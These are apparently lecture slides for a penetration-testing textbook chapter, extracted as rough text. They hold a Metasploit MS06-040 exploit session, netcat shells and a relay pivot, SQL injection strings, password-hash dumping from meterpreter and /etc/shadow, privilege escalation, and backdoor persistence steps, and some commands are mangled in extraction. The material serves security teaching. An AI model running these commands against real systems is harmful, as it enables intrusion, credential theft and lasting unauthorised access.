Transcript Document
Chapter 8: Penetration Testing
Lecture Materials for the John Wiley & Sons book:
Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions
April 25, 2020 DRAFT 1
Key Forms of Penetration Attacks
• • •
Buffer overflows Command injection SQL injection
4/25/2020 DRAFT 2 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions
Network Penetration and
• • • • • • • • • • • • • • • • • •
Metasploit (Console Session)
# cd /pentest/exploits/framework3 # ./msfconsole msf > search MS06-040 msf > use exploit/windows/smb/ms06_040_netapi msf exploit(ms06_040_netapi) > info msf exploit(ms06_040_netapi) > show payloads msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(ms06_040_netapi) > show options msf exploit(ms06_040_netapi) > set RHOST 10.10.100.100
msf exploit(ms06_040_netapi) > show targets msf exploit(ms06_040_netapi) >set TARGET 5 msf exploit(ms06_040_netapi) >show options msf exploit(ms06_040_netapi) > save msf exploit(ms06_040_netapi) > check msf exploit(ms06_040_netapi) > exploit msf exploit(ms06_040_netapi) > sessions –l msf exploit(ms06_040_netapi) > sessions –i 1 meterpreter> ?
4/25/2020 DRAFT 3 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions
Netcat, Pivoting, and Raw Shells
•
Setting up and connecting a listener:
– Target # nc –l –p 80 – Tester # nc 10.10.100.10 80 •
Setting up a 3 machine pivot:
– Target (.30) – Relay Setup # nc –l –p 80 # mknod FIFO p – Relay (.10) # nc –l –p 200 < FIFO | nc 10.10.100.30 80 > FIFO – Tester # nc –10 10.10.100.10 80 4/25/2020 DRAFT 4 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions
Attacking Web/Internet Applications and Databases
• SQL injection attacks: – false') OR ('true' = 'true ’:
Grouping by parentheses
– false' OR 'true' = 'true'; --:
-- is an SQL comment, ends statement
– ' OR 'true' = 'true' - – : 0 ; select * from Student where 0=0 ; - – 0' UNION SELECT * FROM Student where 0=0 - • Paros Proxy is a Backtrack tool for man in the middle attacks 4/25/2020 DRAFT 5 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions
User Enumeration and Hash
• • • •
Grabbing
Gather web email addresses on Backtrack – # cd /pentest/enumeration/google/theHarvester – # ./theHarvester.py –d cnn.com –b pgp Hash grabbing with meterpreter – meterpreter> use privs – meterpreter> hashdump Enumeration on Linux – # cut –d: –f1 /etc/passwd Hash grabbing from root on Linux # grep –v ':x:' /etc/shadow | grep –v ':!:' | cut –d: – f2 4/25/2020 DRAFT 6 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions
Password Cracking
• Password policies on Windows – Local Windows password policies: • C:\> net accounts – Windows domain password policies: • C:\> net accounts /domain • John the Ripper supports password cracking – based on brute force, dictionary, fuzzing • Rainbow table techniques are highly efficient algorithms for cracking complex passwords using tables with exhaustive password/hash lists • Cain & Abel cracks passwords from all Windows formats, popular network devices, and databases using multiple techniques, such as brute force, dictionary, and rainbow tables 4/25/2020 DRAFT 7 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions
Privilege Escalation
• Privilege escalation means gaining administrative privileges, e.g. root • • Some metasploit exploits automatically escalate, e.g.
– modules/exploit/unix/smtp/exim4_string_format, used with the shell_reverse_tcp payload Meterpreter can also escalate, for example: – meterpreter > use privs: Load the Privs module – meterpreter > getsystem –h: Help text – meterpreter > getsystem: Privilege escalation – meterpreter > hashdump: Grab password hashes 4/25/2020 DRAFT 8 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions
Final Malicious Attack Phases
• Forward and Reverse Backdoors – Easy to setup using netcat listeners • Entrenchment – To survive reboot add backdoor to /etc/rc.local, /etc/rc.d/rc.local (both Linux) or the Startup Folder (Windows) • • Hidden Files – Easily accomplished on Windows (checkbox) or Linux (. or .. filename) Rootkits – Rootkits are an ultimate form of malicious entrenchment. 4/25/2020 DRAFT 9 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions
Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions
REVIEW CHAPTER SUMMARY
4/25/2020 DRAFT 10